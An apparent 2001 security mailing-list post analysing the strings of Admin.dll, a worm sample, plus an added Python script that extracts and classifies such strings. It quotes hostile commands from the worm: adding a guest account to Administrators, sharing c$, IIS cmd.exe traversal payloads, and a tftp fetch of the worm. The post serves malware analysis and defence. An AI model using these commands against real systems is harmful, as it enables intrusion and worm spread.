Ok folks, here's what I've come up with when running strings against Admin.dll. I'm by no means a forensics specialist, but here is what I have concluded. I'm sure some of this might be totally off, but it is what I think it's attempting to do.

First I noticed it setting up:

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

It then shows the MIME headers and the content type:

Content-Type: audio/x-wav; name="readme.exe"

This is obviously part of the readme.eml.

Next we see it making some changes or reading of the registry:

[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\

It also seems to add the user "guest" to the Administrator group.

user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add

After this we notice the binary directories and Unicode character sets to be used in compromising the other hosts.

/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

This is an interesting part; it must be net using to the local machine (maybe) with the user guest (who is now an administrator), tftping the Admin.dll and putting it in the current directory and all drive roots C:, D:, etc.

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll

Here's where it inserts the JavaScript to open the evil readme.eml MIME buffer overflow. This I'm not too sure of what it's trying to do.

I imagine it's setting up the email information:

QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe
load.exe -dontrunold
\system.ini
\load.exe

________________________________________________________
The Best News Source On The Web - http://www.disinfo.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
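An added example, not part of the original post or the list archive: a small Python script that does what the post does by hand, namely a strings-style extraction over a binary followed by grouping the recovered strings by what they suggest (privilege escalation, lateral movement, propagation, MIME dropper). The byte blob is constructed from the strings quoted in the post and is not the real Admin.dll; the category names and regex patterns are my own assumptions for triage, not anything the poster or SecurityFocus published.

```python
import re

# Constructed sample "binary": the kinds of strings the post lists from Admin.dll,
# separated by non-printable bytes. This is a made-up blob, not the real file.
SAMPLE_BLOB = (
    b"\x00\x01\x02Concept Virus(CV) V.5, Copyright(C)2001 R.P.China\x00\xff"
    b"Content-Type: audio/x-wav; name=\"readme.exe\"\x00\x90\x90"
    b"localgroup Administrators guest /add\x00"
    b"user guest /active\x00\x7f"
    b"net%%20use%%20\\\\%s\\ipc$%%20\"\"%%20/user:\"guest\"\x00"
    b"tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20\x00"
    b"/winnt/system32/cmd.exe?/c+\x00"
    b"<html><script language=\"JavaScript\">window.open(\"readme.eml\"\x00"
    b"share c$=c:\\\x00\x00"
    b"SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\Shares\\Security\x00"
    b"ab\x00"   # shorter than MIN_LEN, so strings-style extraction skips it
)

MIN_LEN = 4  # same default minimum length as the strings(1) tool

# Indicator categories (assumed names) with patterns drawn from the strings quoted in the post.
INDICATORS = {
    "privilege_escalation": [
        r"localgroup\s+administrators\s+guest\s+/add",
        r"user\s+guest\s+/active",
    ],
    "lateral_movement": [
        r"net%?%?20use",            # URL-encoded "net use"
        r"\\ipc\$",                 # the \ipc$ share
        r"share\s+c\$=",            # c$ share definition
        r"lanmanserver\\Shares",    # server shares registry path
    ],
    "propagation": [
        r"\btftp\b",
        r"/winnt/system32/cmd\.exe\?/c\+",
        r"/root\.exe\?/c\+",
    ],
    "mime_dropper": [
        r"audio/x-wav;\s*name=\"readme\.exe\"",
        r"window\.open\(\"readme\.eml\"",
    ],
}


def extract_strings(blob, min_len=MIN_LEN):
    """Mimic strings(1): return every run of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def classify(strings):
    """Map each category to the extracted strings matching one of its patterns."""
    hits = {category: [] for category in INDICATORS}
    for s in strings:
        for category, patterns in INDICATORS.items():
            if any(re.search(p, s, re.IGNORECASE) for p in patterns):
                hits[category].append(s)
    return hits


def scan(blob):
    """Run extraction then classification; returns {category: [matching strings]}."""
    return classify(extract_strings(blob))


if __name__ == "__main__":
    for category, matches in scan(SAMPLE_BLOB).items():
        print(f"{category} ({len(matches)} hits)")
        for s in matches:
            print("   ", s)
```

Run against a real sample, `scan(open(path, "rb").read())` gives the same grouped view the post builds by eye; strings that land in no category (the copyright banner, the SMTP verbs) are still returned by `extract_strings` and are worth reading manually, since the categories only cover what the post already identified.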
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 14:03:23 PDT